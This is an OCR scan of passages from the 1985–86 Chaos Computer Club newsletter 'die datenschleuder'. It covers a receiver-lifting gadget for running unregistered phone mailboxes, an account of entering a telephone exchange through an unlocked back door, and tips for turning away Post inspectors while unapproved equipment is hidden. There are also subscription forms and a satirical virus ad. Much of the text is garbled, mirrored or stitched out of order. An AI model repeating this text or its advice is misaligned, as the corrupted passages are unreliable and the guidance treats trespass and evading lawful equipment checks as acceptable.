1) Ich gehe selbst an den Hörer, was auf die Dauer in Arbeit aus¬ 
arten könnte 

2) Meine Katze ist tatsächlich überdurchschnittlich intelligent 
und entsprechend gut dressiert 

3) Mein Tierchen wird zusammen gehäkelt und übernimmi ge- 

^ S ® wIr 

Tierschülzer wählen Punkt 3! ^ ^ ^ ^ 

Damit das Tierchenweifl. wann esaktivwird,muß es das Klingel- Toiofnnnnm^^^ nttonti Porr,=nro.-hhiirh a,if 

Signal erkennen können. Die eine Möglichkeit ist ein Klatsch- ^ nJ fnsprechbuch auf- 

schalter - aber nicht sehr empfehlenswert, da diese Dinger auf o'' 

alle möglichen Geräusche ansprechen und außerdem das Tele- ihr .n» Inn n" 

fon Immer erst mal kräftig klingeln muß. Besser ist es wenn wir wTn kn ZirzlnlnJnhu?« L r , n. h U-?rf 

HnnKiinn»i-Sir,n»i,nH.,i<tk(rih ,',h.r,.in=.c!r„,i.„n.=rH..mToi. bessere Weg ist. einen Zweilanschluß (kostet ca. die Hälfte 


mäßen' LOGOFF passiert nichts anderes. Im Anschluß an diese 
Prozedur macht der Computer das Tierchen noch wieder 
'scharf und da Spiel kann von vorne beginnen! 

Kosten für unser Tierchen — je nach Aufwand: ca. 25.— bis 
50,— Märker. Der Phantasie sind bei der Gestaltung keine 
Grenzen gesetzt und so würde sich vielleicht ein kleiner POST- 
gelber Kran sehr decorativ machen. .. 

Die bislang originellste bekannte Lösung ist ein kurzes Stück 
Modelleisenbahn. Die Lok fährt beim Klingeln an und hebt über 
einen Seilzug einen Minisandsack hoch. Zum Auflegen fährt sie 
rückwärts. 

Wer nun wirklich eine Stückliste o.ä. braucht, dem sei (z. B.) 
eine ältere Ausgabe der Zeitschrift 'RUN' empfohlen, Im Artikel 
'Haarscharf an der POST vorbei’ wurde so ein Tierchen bereits 
1984 als 'Anrufbeantworter' detailliert mit Schaltungs- Vor¬ 
schlägen erklärt. 

Noch ein paar Tips am Rande: 

Jeder Teilnehmer hat für die ordnungsgemäße Abwicklung sei- 


das Klingel-Signal induktiv (d.h. über eine Spule unter dem Tel.- 
App.) abgreifeni Das hat den Vorteil, daß herkömmliche Laut- 
weri<- App. sogar auf ganz leise gedreht werden können - leider 
nicht die moderneren ALPHA- BETA- etc. Telefone — funktio¬ 
nieren tut unser Tierchen aber auch damit, da das Tierchen sich 
mit dem ersten KHngel-lmpuls zufriedengibt. Der induktive Ab¬ 
griff ist It. Amtsblatt-Verfügung Nr. 1009 (Ambl. Nr.145/1981) als 
private Zusatzeinrichlung genehmigt und anmelde- und gebüh¬ 
renfrei! Ueber eine hier nicht näher erklärte einfache Schaltung 
wird dieses Signal verstärkt und dann mittels Relais ein kleiner 


eines Hauptanschlusses und wird bei einer Mehlbox ohnehin 
benötigt) zu beantragen, dafür muß man nämlich keinen Eintrag 
ins Tel.-Buch vornehmen lassen! Und wo kein Eintrag ist, kann 
ich mich melden wie ich will — also auch gleich mit einem Car¬ 
rier! _ 

Cw ' ^» 11^1 

Nachsatz: Sollten sich die Kollegen POSTler dennoch unter ir¬ 
gendeinem Vorwand die bestehende Telefonanlage des Betrei¬ 
bers ansehen wollen so wäre vielleicht noch anzumerken, daß 
dies durchaus deren gutes Recht ist — ABER NUR NACH 


vorheriger Anmeldung und zu zumutbaren Tageszeiten 

nach oben bewegen, bis dieser an seine obere Endabschaltung 
kommt (Microschalter). 

Die 'Anlage' wird nun so aufgebaut, daß der Telefonhörer be¬ 
reits fest im Koppler drinsteckt und der besagte Hebel in Ruhe¬ 
stellung auf der Telefangabel aufliegt und diese sanft runter¬ 
drückt. Unter keinen Umständen die darf die Feder, die die Tel.- 
Gabel hochdrückt gegen eine 'ältere überdehnte’ ausgetauscht 
werden, da die Gabel mit einem schwachen Motor dann sehr 
leicht runtergedrückl werden kann: Eingriffe in den POSTeige- 
nen App. and selbstverständlich verboten. 

Opfer in der Bank lösten einander ab 


« —. — — Ul 


Die Dresdner Bank am Gänse- 'S « S 
ma/kt ging am Mittwoch abend S'o-S 
buchstäblich auf Kundenfang. Wer 4 g-e 
sich an ihrem Geldautomaten mit '-o c 
Barem versorgen woUle, kam zwar 3 w g 
in den Vorraum hinein - aber an- £ « g 
schließend nicht mehr heraus. >. b § 
Insgesamt waren ea mehrere Dut- *0 « u 
zend Menschen, die so fUr eine Wei- i | 
le eingesperzt waren. Sie maßten n ^ § 
auf den nächsten Kunden, der die g!pjs 
elektronische Tür-Automatik von 2 6 
außen mit Hilfe seiner Euroscheck- «pg 
karte öffnete. Was war passiert? h v 


Wenn sich die Herren also nicht angemeldet haben, sollte man 
sie unter Ausdruck des tiefsten Bedauerns wieder unverrichte¬ 
ter Dinge wegschicken. 

© 10/85 Sy/RAMses 

■ 6 unßnpa/\ jnz uaj 

-! 0 Ssgoas eseip uagejsuajnai^jBpay uain© •„)(pnja ujnz jn 6 „ 
igpfu goou jaqe pu!S ’ßunjiBLios ppusujagosja ßiiiunujaA aufa 
Ljone uaiiBMiua AX-AVd i 9 qn uajias sqoas uaiön/aßisq aiQ 
'uoij^iepay aip ue ^aug oiauia 
U| OS /so^uuoA e6|U!a qieqsaa uapjaM jöiazaö^ne uaÄu 

-BUJaiiv uassntu jaiq ‘ 6 unu! 0 /g J9P uiq qo| Al-^ed sep iujluo^ 
‘;qoeuj ßummos JazjBMqos jana ajp ‘ßun|aqB>^jaA Jap v.Vin 

Impressum: dalenschleuder U. Dezember 1985 Das wissenscnaiiiicne Facnoiaii für Daienreisenae 
SfbcheiPl acMmal im Jahr alle42 (!) Ta^e Verleger und VisdHmbPG Her wart HoMafid-Montz. SctiwencLesir 
S5. O-20(X) Hdfcburg 20 RedaKtionsadresse e&enda. eleH'oncsch IMCA CHAOS-TEAM Eigendruck tm 
Selbstverlag Oateniioriveriterurig und Satz BiTB Neue Jahresbezugsprcise DM 60 normal. DM 30 
Schüler u a . ah OM lOO Forderabo die veroltonliichien BeHrage smd u'heberrechilich geschot;! 
Vervieltailinungen tut gewerbliche Zwecke verpfiiciuen 2ur Gebuhfenzanlung an die VG Won. Abt Wt 
Goelheslr JO 8000 München 2 Weilerverbretlung m kostenl(Dsen elektronischen iniorrnationsdiensten 
nach den in iMCA. Brett Dalenschleuder. veroflentHchten Vc'breilur.gsLedmguf'gen gestaltet die ds ist 
abrufoar via IMCA uf.d angeschlossene iNTERMAIL-Hosts COMBOX CCC NEWS BMI-NET ZEV 
einige Teielonboxen In Rix “fiSS-lZl mit Be^teilservice Kopier-Recnt (Nachdruckrecht) (ur n'cht 
gewerbi'Che Zwecke Nur emwandfrerc Vorlagen der neuesten Ausgabe verwenden Komplett vervieilalligen 
Abgabe nur kostenfrei Auszüge nur mit dem Hinweis 'ausdatenschleudcr l3, C992rF Der Zusammenhang 
aus dem die Vorlage stammt sollte «rkonnbar bleiben. Zwei Belegexemplare an die ds-Rcdaklion 
Compuskripie per Pos! aut Fioppy 3 5 MSOOS/10S''XF. 5 1'^ Siri'js/C64.TVT802 (nur notfalls IBM) ode 
oaoiern VI.-J Dal«*« (nur nach Ansbr.ir.ne“) über ZCZC ans CHAOS-TFAM impreslS ws 850929 Z’nrj 












© datenschleuder 14 ä De 2 ember 1985 ■ö' C9927F 




Alltägliches Chaos 


Besuch bei der Post 


Formblött TEXT/BESTELL .US 851013 1415 gültig bi? Er =ctie i n&n NDVS5 

Bei Beder-f dieses Fcirmblett -f o t ok op i er be.r . 


Probleme mit einer kaputten Harddisk sowie Softwarehinund- 
her verzögerten das Erscheinen dieser Ausgabe entschieden. 
Ein Haufen Text ist nicht 'sch enen. da wir aus Kostengrun¬ 
den erst bei über 1000 Abonnenten die Zeichenzahl pro Aus¬ 
gabe erhöhen werden durch mehr Seiten. Kleinere Schrift 
(wie in der 131 führte zu Proleststürmen. 

Die datenschleuder wird (efzt nicht mehr mit der Buchma- 
schine. sondern mit einem eigenen Satzsystem erstellt. Wenn 
es fertig ist. läuft es auf einem Netzwerk aus 520ern. 

Die bisherige Versandabteilung schaffte die Arbeit nicht mehr 
(ist alles 'ehrenamtlich“) und die Daten sind am “Umziehen“ 
in die Clubräume (feuchter Keller, mehr ist finanziell nicht 
drin). 

Bel der Durchsicht des Bestandes, der aufgrund von Be¬ 
schwerden dringend wurde, stellte sich heraus, daß die An¬ 
zahl verschickter Exemplare deutlich größer als der Geldein¬ 
gang ist: Lesertyp A bekommt die datenschleuder schon ein 
Jahr umsonst und Nichtlesertyp B hat bezahlt, aber nichts 
bekommen. A ist viel größer als B und erklärt unser finanziel¬ 
les Loch. 

Außerdem gab es (svohl wegen nicht abschließbaren Briefka¬ 
stens) Verluste eingegangener Post bei der bisherigen 
Adresse — da verschwand nicht nur Bargeld aus dem Brief, 
sondern manchmal, so unser Vedrdacht, gleich die ganze 
Post. Bitte deshalb NUR die neue Redaktionsadresse benut¬ 
zen: Schwenckestr. 85,2 HH 20. 

Langsam bilden sich (vBr)waltende Strukturen aus dem 
Chaos. Es wurde ein einheitliches Beslellformblalt entwickelt, 
das umseitig abgedruckt ist. Ein gezielte Verschickung (rund 
15 Exemplare) an ausgesuchte Besteller ergab, daß etwa 14 
das Bestellformblatt ordnungsgemäß ausgefülM zurück¬ 
schickten. Aber einer fuhr wieder voll auf die 5 OM Marken ab 
(Satellitenantenne) und schickte entsprechend mit. Wir kön¬ 
nen sie nicht gebrauchen, wie bereits kurzes Nachdenken er¬ 
gibt und die Post lauscht nicht um. Vorsicht: Wir schmieden 
böse Rachepläne gegen alle, die zu teure Briefmarken schic¬ 
ken! 

Wers eilig hat: Bestellungen mit diesem Formblatt werden be¬ 
vorzugt bearbeitet, da es von (fast) allen CCC-Mitgliedern 
(wie leicht einzusehen ist) bearbeitet werden kann. 

Wichtige Informationen. Danksagungen. Schmähungen und 
Beleidigungen sowie Liebesbriefe bitte getrennt einreichen. 
Einige Beschwerden gab es zur Hackerbibel. Bericht zur La¬ 
ge: 

In Tag- und Nachtarbeit entstanden Anfang August die letzten 
Seiten in Hamburg, Dabei traten nur kleinere Katastrophen 
auf (zB beginnt der Telex-Artikel mit "Itumspannendes Telex¬ 
netz*. die Vorlage für die Btx-geht-Seite wurde versehentlich 
nicht abgeschickt und abgedruckte datenschleudern sind nur 
richtig sortiert, wenn Seitennummern drautstanden. Oer 
Drucker war trotz verspäteter Einlieferung pünktlich und das 
Buch wurde, wie in ds- ifa-Sonderausgabe angekündigt, ab 
1$. 9. ausgeliefert. 

Wegen Mchieintreffens der CCC-intern angekündigten ko¬ 
stenlosen Versandtüten konnten bei der ersten Verschickung 
nur PLZ-mäßig niedrige Subskribenten versorgt werden, dann 
waren die vorsichtshalber trotzdem teuren Tüten alle. 

Auch einige Belegexemplare wurden nicht verschickt. Und 
vom Bahnhofspostamt mußten wir mit den zwei Zentnern zum 
Nachtschalter am Hühnerposlen. Naja. Zwei Tage später, als 
wirmeinten, der Kram sei jetzt vom Tisch, rief der Gebühren¬ 
prüfer an und wollte über 100 Mark extra für die ersten 98 
Exemplare. "Werbung“ sei Im Buch, deshalb sei es ein Päck¬ 
chen. Aufs. 37 sei etwas mit Preis angeboten. Unser Wider¬ 
spruch. es handle sich um einen Aprilscherz auf englisch 
(does your Computer sometimes cough, sneeze or have a 
seizure? Blitzbug 19.95 Dollar. Rezeptfrei. Nur nach Anleitung 
verwenden!), ward akzeptiert, der Gebprü meinte, er könne 
kein englisch. Über Seite FF usw. mehr an anderer Stelle in 
dieser Ausgabe. 

Abschließend soll der verwaltungsinterne Begriff der Vernich¬ 
tung durch Materietransformation ersetzt werden. 

/nfernf4.ws 651206 


Eigentlich wollten wir ein paar Artikel iur die nächste OS überar¬ 
beiten. Während wir bei Kakao-Kaffee die neuesten Antwortsei¬ 
ten in BTX durchgehen und ich nebenbei meinen Kontoauszug 
Im externen Rechner der Verbraucherbank ansehen will, ge¬ 
schieh! Seltsames. Alle Telefone der vier Amtsleitungen im 
Raum zeigen nacheinander das von Leitungsprüfungen her be¬ 
kannte Tickern. Und ich hatte gerade meine Kontogeheimzahl 
eingegeben * Ls23 nimmt den Hörer von einem der freien Appa¬ 
rate und versucht auf der toten Leitung mit dem Tester zu reden. 
Wie zu erwarten: Set Erfolg ■= kein Erfolg. Auch ein Anruf bei der 
Störungsstelle mit der Frage, ob im Fernmeldebereich Bauar¬ 
beiten durchgeführt werden, führt zum selben Ergebnis. Aber 
wir erfuhren, wo die zuständige OVSt (Ortsvermittlungsstelle) 
ist. Wir beschließen, die Leitungen selbst zu “entstören“. Mit 
dem noch von der Fahrt zur Hannovormesse leicht verbeulten 
VW Variant gehts zur zuständigen OVSl. Die vordere Tür ist zu. 
Der Hintereingang ist zwar gut versteckt, aber wo ein Hackerist 
ist auch ein Weg. Den Wagen stellen wir auf den Diensthof ab 
und machen uns auf die Suche nach einer offenen Tür. Sie ist 
schnei) gefunden und durch einen Ziegelstein gesichert. Das 
Schild ‘Oienstgebäude. unbefugter Zutritt verboten!“ kann uns 
nicht schocken, wir fühlten uns befugt. Auf dem Flur entdeckt 
Ls23 beim Schwarzen Brett einen Wohnungsnachweis für Post¬ 
ler. den nimmt er ersimal mit fm nächsten Stock sind wir unse¬ 
rem Ziel näher, die seitlichen Türen sind hier aus feuerfesten 
Stahl, nur leider zu. Im vierten Stock werden wir endlich fündig, 
eine Tür ist nur angelehnt. Wir treten ein und stehen vor den Re¬ 
laisschränken. Sofort beginnen wir mit der Suche nach den ge¬ 
störten Anschlüssen Plötzlich tauchen drei Fernmeldetechnl- 
ker auf: “Von welcher Dienststelle kommen Sie?’. Ls23 nennt 
seine Tel Nr. 'Ich verfolge eine Störung Im Fernmeldenetzl“. 
Daraufhin lassen auch die letzten Gelben Herren Relaisputzbe¬ 
steck und Orehwähler sinken. Oer Herr der uns angesprochen 
hat fragt sichtlich nervös “Wie sind sie hier hereingekommen 
Er kann noch immer nicht glauben, daß wildfremde Leute ohne 
Dienstausweis in seine geheiligten Halfen eingedrungen sind. 
’Na. durch die Tür!’. ’Oie sind doch zu!“. “Oie durch die wr ge¬ 
kommen sind wars nicht!'. ‘Welche soll das gewesen sein'’“. 
'Na die hinten zum Hof raus!*. ‘Muß wohl jemand nicht richtig 
abgeschlossen haben. Was wolfen sie hier überhaupt?“ “Ich will 
wissen, ob auf meinen Anschlüssen gemessen wird und was es 
soll Datengespräche zu stören*. Es folgt die typische Beamten¬ 
notantwort; “Darüber bin ich nicht berechtigt Ihnen Auskunft zu 
erteilen. Verlassen Sie bitte unverzüglich das Gebäude!*. Er hal 
sich inzwischen gefangen, baut sich herrisch vor uns auf und 
deutet unmißverständlich zur Tür. Wir wollen es nun doch nicht 
übertreiben und lassen uns noch bis aus dem Haus begleiten. 
Zum Abschied überreichen wir unserer Sicherheitsbegleitung 
einen Chaos-Aufkleber als Andenken. So richtig glauben kann 
Ich das. was ich da erlebt habe, eigentlich bis heute noch nicht! 
Aber mein Password für die Verbraucherbank habe ich sofort 
geändert. Als ich der Dame in der Bank als Grund "Abhören von 
BTX durch Unbekannt* nannte, hat sie zwar etwas irritiert ge¬ 
guckt. aber die Änderung ermöglicht. Zwei Tage später erschie¬ 
nen die drei Herren vom Gilb persönlich bei LS23. Sie beabsich¬ 
tigten die funktionierenden Leitungen zu überprüfen. Sie schei¬ 
terten. da sie es versäumt hatten, sich fernmündlich anzumel¬ 
den (alle vier Telefonleitungen waren bislang nie gleichzeitig de¬ 
fekt) und das Horoskop nicht günstig war. Rausgehen durften 
sie allerdings alleine. 

*★****★★**★ 

Elektronische Mitfahrzentrale • , „ • 

Als erste private Mailbox hat die C.L.I.N.C.H. - Box in 
Hamburg als zusätzlichen Service für die User eine 
'elektronische Mitfahrzentrale' in Betrieb genommen. 
Die elektronls'fche Mitfahrzentrale in der C.LI.N.C.H. - 
Box ist natürlich rund um die Uhr unter der Rufnum¬ 
mer 040 / 632 3517 zu erreichen, 
goblln/clinch ds14-e 


Redaktion Datenschleuder * Schwencke-85 * 2000 Hamburg 20 * ?:CHAOS-TEAM 


Rechnung <riur mit S i ege 1 )/Bes t e 1 )-f e t r en 


He.mbur Q , Poet t empe 1 de t >:~ 


Hiermit wird um Er'füllunQ der 
letztlich unberechenbaren U!ün 


CCC VW 

20 

, 0 0 

DM 

cccFl 

ab ; 

230 

DM 

cccNl 

1 20 

,00 

DM 

cccSl 

60 

. 00 

DM 

cccSO 

30 

,00 

DM 

dsFE 

2 

,50 

DM 

dsLl 

999 

,99 

DM 

dsFl 

ab : 

1 00 

DM 

dsNl 

60 

,00 

DM 

dsSl 

30 

,00 

DM 

dsHO 

60 

,00 

DM 

dsHl 

33 

, 33 

DM 

dsKlO 

3 

, 33 

DM 

dsKCC 

1 

, 00 

DM 

dsAbh 

3 

, 33 

DM 

dsKop 

- 

,30 

DM 

PV4 

4 

, 00 

DM 

FVT 

??? 

,?? 

DM 

i efere 

deshalb: 


V-Scheck 


DM 

Br f ma r 

kn 

,05 

DM 

Brfmark.n 

,50 

DM 

Brfmar 

kn - j 

, 80 

DM 


im "(01 gen den s t ü.ck za.h 1 mäf-i 9 spezi-fizierte* 
sehe gebeten. 

Beiträge Uerein zur Förderung des CCC 
Au-fnahmegebühr (einmalig, Verwaltung) 

gewünschte Lei tstel 1 ennummer : _ <.*) 

Förderndes Mitglied bis 3l.Ei.tiC' 

Normales Mitglied bis 31.S.36 

Schüler u.ä. bis 31.8.86 

Schüler u.ä. bis 28.2.86 

naturgemäß porto-frei und unverpackbar 

Chaos-Jahr endet mit Schalttag oder nicht 

Probeexemplar ds-aktuell 

Ein Abo bringt Unbekanntes o-fter! 

Lebensabü ds (wer oder was lebt länger"’) 
Förderabo 8 Ausgaben (1 Jahr) 

Jö,hresabo B A. Norme 1 verdi ener 
Sonderabo 8 A. NUR Schüler u.ä.!!! 
Sonderabo und Hackerbibel Teil 1 
dsPE-dsHO jeweils inkl. Porto/Verp. 

Hackerbibel Teil 1 

Je 10 Kleber CCC Kabelsalat spriwasge. 

1 Kleber Chaos Cnoten wasser-fest 
6 ^ Kleber Achtung Abhörgefahr 

pro Stück Fütokopien aus dem Archiv leut 
beiliegender Liste ( nur für Redakteure ) 

Porto und Verpackung Hackerbibel 

Porto, Verpackung, Trinkgeld -für den Rest 


,_ Versand er-folgt nach Geldeingang 


o» 

<j> 

O 

10 

<X) 

05 


n 

E 


a 

it 


Uli th i n-f 1 ati on , 
wei^e an even betten buyl 


_ und in ■folgender Form: 


da.s sind zusamrTien 


DM 


Alls rfordrlch btt sorg-fttg aus-flln! 

_ Nchts wchtgs wglassn! ! ! 

Ulr habn sehn gnug zu tun mt Vrwal tngsschß! 


Abs Datenschleuder 2HH20 C9927F 

! ! <-- Hier Adresskleber befestigen 

! ! zwei terf anheften zum Verschicken 

! ! fallsnichtrmind.l Dl-i T r i n k c- e t d 

! ! Aufschlag für Mehrarbeit und 

! ! <— Adresse hier links lesbar ^ 

! ! ein tragen! ^ 

! ! Hier Datumstempelplatz für Verwaltung v 

1_!_V_V_V_ 

Formblatteinganö Geldeingang Auslieferung Archivierung VernichtUrig 


<*) Lei tstell ennummer umfaßt c*. 4 Zi-f-fern. Stelle 1*2 ist iei-VorwähT 

<WV4 40, Betriin 30, Kiel 43 ^ c v,u«4 ^ »r--e c.\ a_ 






Chaos 

Communication 
Congress ’85 

Die Europäische Hackerparty 
am 27.-29. Dezember 1985 


Eidelstedter Bürgerhaus, 
Elbgaustraße 12,2000 Hamburg 54 
10.00-18.00 Uhr 


Was heute noch wie ein Märchen klingt, kann Morgen Wirklichkeit sein. Hier ist ein Märchen von 
Übermorgen. Es gibt keine Kupterkabel mehr. Es gibt nur noch die Glasfaser und Terminals in 
jedem Raum. Man siedelt auf fernen Rechnern. Die Mailboxon sind als Wohnraum erschlossen. 
Mit heute noch unvorstellbaren Geschwindigkeiten durcheilen Computer-Clubs unser Daten¬ 
verbundsystem. Einer dieser Computer Clubs ist der Chaos Computer-Club. Gigantischer Teil 
eines winzigen Sicherheilssystems. das die Erde vor der Bedrohung durch den Gilb schützt. 
Begleiton wir den CCC und seine Mitglieder bei ihrem Patrouillendionst am Rande der 
Unkenntlichkeit. 


DAS Treffen für Datenreisende! Telefon, Datex, Btx, Mailboxbetrieb, 
Telex, Datenfunk, Videovorführung. 

Aktive Workshops. Video- & Papercopiers 


Eintritt: Mitglieder DM 20- 

Private Kongressteilnehmer DM 30,— 

Presse DM 50,— 

Gewerbliche Teilnehmer DM100,— 


Voranmeldung durch Überweisung 
auf Postgiro 5512 57/204 PschA Hamburg 
Sonderkonto C/S. Wemöry 




Programm des Jahres 1986 

Viromat plus 

Zum Ejnführungspreis von DM 19,97 ist jetzt der Viromat Plus 
Version 0.0 für verschiedene Rechner erhältlich — dos Muß für 
jeden Hacker. 

Oos Neue Hacker-Universollexikon zum Thema: 

“Viren (lot), sehr kleine, im Ultramikroskop slchlbore, gonz oder 
zum größten Teil aus Bitketten bestehende Körper von kugel- 
bls stäbchenförmiger Gesfolt (0 bis 1), parositor, oußerordent- 
lich virulent. Wenig differenzierte Kronkheitserreger (z. B. 
Croyppe, Poliovoxitis, Masern64). An der Grenze zwischen be¬ 
lebter und unbelebter Intelligenz; Vermehrung nur im Wirtsre* 
glsterberelch; viele Viruserkronkungen erzeugen lebenslöngli- 
che Immunität, daher vorbeugende oktive Immunisierung viel' 
loch erfolgreich.” 

Für eine Douer von 6 Monoten und bei normoler Anwendung 
wird gewährleistet, doß Material und Herstellung der Diskette, 
auf der Ihr Virus gespeichert ist, frei von Fehlern sind. Do es 
nach gegenwärtiger Technik nicht möglich ist, einen Virus so zu 
entwickeln, daß er, insbesondere im Zusammenhang mit onde- 
ren Viren, fehlerlos arbeitet, entfallt jegliche Garantie. Normo* 
lerweise betrögt der lythische Infektionszyklus etwo 30 Nano- 
johre und bewirkt dauerhofte Viroimmunitöt. 
viromol 5.WS 851218 


Telecontrol — wie geht das? 

Mit sechs Tosten von "sehr schlecht” bis "ausgezeichnet" können 
von Medienkontrollfirmen bezahlte Fernsehzuschouer dos Pro¬ 
gramm bewerten. Eine Konfrollmaschine mit Telefonanschluß 
und Modem steht in den betreffenden Wohnzimmern. Im Dun¬ 
kel jeder Nacht ruft der Dotensammelcomputer dort an und die 
Doten ob. Sie werden aufbereitet und am nächsten Tag ob elf 
Uhr kann ein kleiner Haufen Medienkontrolleure dotenmößig 
obrufen, wer was gesehen hat. 

Die lassen sich den Spaß zweistellige Millionensummen pro Johr 
kosten, damit — verkürzt ousgedrückt — der Vizepräsident 
eines Getränkekonzerns mit weltweitem Abfüllsystem auf 
einem Kongreß in Hamburg verkünden darf, daß sie für Fern¬ 
sehwerbung in der BRD nur 44% des lokalen Budgets ausgeben, 
in Brasilien dagegen 90%. Bei uns seien während der "ungünsti¬ 
gen" Werbezeit nur rund 28% der Berieselungsmaschinen an¬ 
gestellt. Da suchen die Konzerne sich etwas anderes für die 
Werbung. Im Moment entbrennt der Kompf um die TV-Satelli- 
tenparkplötze om Himmel. 

"Der Mensch konsumiert Informationen, die er nicht mehr über¬ 
blicken, geschweige denn kontrollieren kann. Seine kommunika¬ 
tiven Fänigkeiten verkümmern" schreibt eine politische Wo¬ 
chenzeitung. 
telcfllS.ws 851220 


Postprüfplaleetten Produktionsbe¬ 
ginn 

Zum ersten Jahrestag der Btx- Fernmelderechnung von über 
130.000 DM wird die gute (?) alte (!) Ffz- Nummer durch das 
neue "DBP- Zulassungszeichen" ersetzt. Wer noch Gerate mit 
Ftz-Nummer hot, muß nicht besorgt sein, daß diese vom 1. April 
an nicht mehr den zum Teil unberechtigten Vorschriften der DBP 
entspricht, denn "die bisher vergebenen FTZ-Nummern gelten 
weiter, solange die Zulassungen nicht erlöschen und widerufen 
werden”. 

So sieht das neue Zeichen aus: 



Ober kurz oder lang wird das gute (!) alte (1 (aber (noch) nicht 
veraltete...)) Dotenklo eine Ftz* Nummer (sorry) ein DBP- Zu- 
lossungszeichen erholten. Denkt darüber nach, wie sich dieses 
Zeichen am effizientesten per Computer und Matrlx/Laser- 
drucker erstellen läßt, damit Ihr eure Klo's mit Testausdrucken 
topezieren könnt. 

Weiter im (Post-)Text: "Nöhere Einzelheiten zur Kennzeichnung 
zugelossener Fernmeldeeinrichtungen können dem Amtsblatt 
128/1985 entnommen werden." 

ZZFLl-1 B3240voml3.11.1985 

P.S.: Die Vorschriften über die Wischfestigkeit von Ftz-Num- 
mern bzw. DBP-Zulassungszeichen sind im Gegensatz zu den 
Vorschriften, die die Technik betreffen, nicht genügend defi¬ 
niert, da es schon zu Beschlagnahme eines Akustikkopplers Typ 
Dataphon S-21D gekommen ist, well die Ftz-Nummer durch 
höufigen Gebrauch stark verwischt war und die Polizei deswe¬ 
gen bezweifelte, daß der in dsl4 genonnte Koppler überhaupt 
eine besitzt. 
e5Co/ls38 

/xi/ws/ftzneul5.w5 860323 1522 

die datenschleuder 15, März 1986 

das wissenschaftliche fachblatt für datenreisende 

D-2000 Hamburg 20 

Schwenckestraße 85 

Geonet: Geol :Chaos-Team 

Brett Dotenschleuder 

Btx: -^055321^ 

Herausgeber und ViSdPG 
Herwart Holland-Moritz 
Mitarbeiter dieser Ausgabe (u.o.) 

R. Schrutzki, S.Wernery, A.Eichler, P.Franck, H.Gruel, M.Kühn 
Eigendruck im Selbstverlog. 

Mörz 1986 


Blx 655322 


Seite 1 





Trara — die Post ist da! 

Hinweise für Ausfälle der dritten Art 


Datensch1euder 
15 = März 1986 
oeite 2 


Trara — die Posi ist da 

Hinweise für Ausfälle der dritten Art 

Der Redoktion sind in letzter Zeit vermehrt Berichte zugegan¬ 
gen, aus denen Idar hervorgeht, daß immer noch gewisse Unsi¬ 
cherheiten herrschen, wenn es um den Umgang mit dem grö߬ 
ten Dienstleistungsunternehmen in diesem unserem Lande geht. 
Wir wollen daher noch einmol zusammenfassen, wie man sich 
tunlichst zu verhalten hat, wenn es zu staatlichen Ausfällen wg. 
Postkommt. ...... . , 

Oberster Grundsatz ist auch hier: keep cool! Nichts wird so 
heiß gegessen, wie es gekocht wird und man kann viel Unheil 
abwenden, wenn man sich informiert, bevor irgendwelche Kin¬ 
der in ominöse Brunnen fallen. Wer sich nicht sachkundig 
macht, bevor er zum Beispiel ein Modem anschließt, handelt 
grob fohrlössig und müßte eigentlich wegen Dummheit noch 
eins obendrour kriegen. 

Grundlage für alles Handeln der Post ist In unserem speziellen 
Fochgebiet die Fernmeldeordnung mit den dazugehörigen 
Verwaltungsanweisungen. Letztere sagen aus, was mit den 
Paragraphen der FO wirklich gemeint ist. sie sind also für uns 
besonders wichtig. Wer dafür genügend Kohle locker machen 
kann, sollte sich den Kram bestellen, wobei es sehr unfein ist. die 
Leute im nächstbesten Telefonlädchen deswegen in Verlegen¬ 
heit zu bringen. Bestellt den Krom beim zuständigen Fernmel¬ 
deamt, die Verwaltungsbeamten da wollen \o ouch mal was an¬ 
dres tun. Wer sich dos nicht leisten kann, muß mit unseren Tips 
zufrieden sein. 

Es gibt drei Stadien von postolischen Ausfällen. Nummer eins ist 
ein überraschender Anruf: 'Müller, Fernmeldeamt brabbel... 
wir haben festgestellt... usw’. In diesem Fall empfiehlt es sich, 
dem netten Beomten die FTZ.Nr. des eigenen Kopplers mitzutei¬ 
len und Ihn darauf hinzuweisen, daß man ausschließlich mit die¬ 
sem Gerät tätig wird. Sollte er den Verdacht, man benutze un- 
postalische Gerate, wiederholen, empfiehlt sich die Papageien- 
taktik: 'Ich sagte doch bereits, ich benutze ausschließlich einen 
Koppler mit der FTZ.Nr. 18.13.1808.00 der Firma E....' Gegebe- 
nen/olls so lange wiederholen, bis der nette Herr aufgibt. 

Stufe zwei zuendet mit einem überraschenden Schellen der Tür¬ 
glocke. Zwei bis drei nette Herren präsentieren ihren Dien¬ 
stausweis und bitten mehr oder weniger höflich um Zutritt. Emp¬ 
fohlene Reaktion: Höflich um nähere Betrachtung der Ausweise 
bitten. Falls dos Ansinnen abgelehnf wird, Zutritt verweigern, 
die Herren sind verpflichtet, sich auszuweisen. Ausweise sorg¬ 
fältig prüfen (in der Zwischenzeit besteht Gelegenheit für zufäl¬ 
lig anwesende sachkundige Besucher, aufzuroumen). Besonde¬ 
res Augenmerk auf die Gültigkeit der Ausweise richten, dos 
Verfalldatum ist noch vor dem Namen des Inhabers vermerkt. 
Bei ungültigem Ausweis: Zutritt verweigern. Bestehen hinsicht¬ 
lich der Ausweise keine Bedenken, einen Blick auf die Uhr wer¬ 
fen. Zutritt braucht nur während der üblichen Geschäftszeiten 
gewährt zu werden. Das legen wir einmal bankmäßig aus und 
verwehren in der zeit von 18.00 bis 07.00 uhr ohnehin den Zu¬ 
tritt. Sodonn fragen wir die Herren, ob sie sich ongemeldet hot¬ 
ten. Wird dies verneint, oder ist sicher, daß eine Anmeldung 
nicht erfolgt ist, drücken wir unser Bedauern aus und verab¬ 
schieden die Herren. Sehr hilfreich ist dabei die Floskel: 'Es tut 
mir [O ausgesprochen leid, aber meine Frau (Freund(in),ßekann- 
te(r)) is grod unter der Dusche.. .kommen sie doch n andermal 
wieder, ja ?’ 

Stufe drei ist die gefährlichste, hierbei erscheinen wiederum 
mehrere Herren, diesmal ist ober auch jemand von der Stoot- 
sanwaftschoft dabei und präsentiert zusätzlich zum Ausweis 
einen richterlichen Durchsuchungsbeschluß. Hier hilft eigentlich 
nichts mehr, außer man ist vorgewamt und vermeidet diese 
Konfliktsituation, indem man nur während dere/gent/ichen ße- 
triebszeit die Anlagen angeklemmt hat.Zu jedem anderen Zeit¬ 
punkt sollte eine ordnungsgemäße Fernsprechanlage vorhan¬ 
den und angeschlossen sein.. 


Noch etwas: Beschlagnahme von Geröten kann in jedem Fall 
nicht durch die Post erfolgen, sondern nur durch Polizei oder 
Stoatsanwoltschaft. Postler hoben die Anvveisung: 'Die nicht 
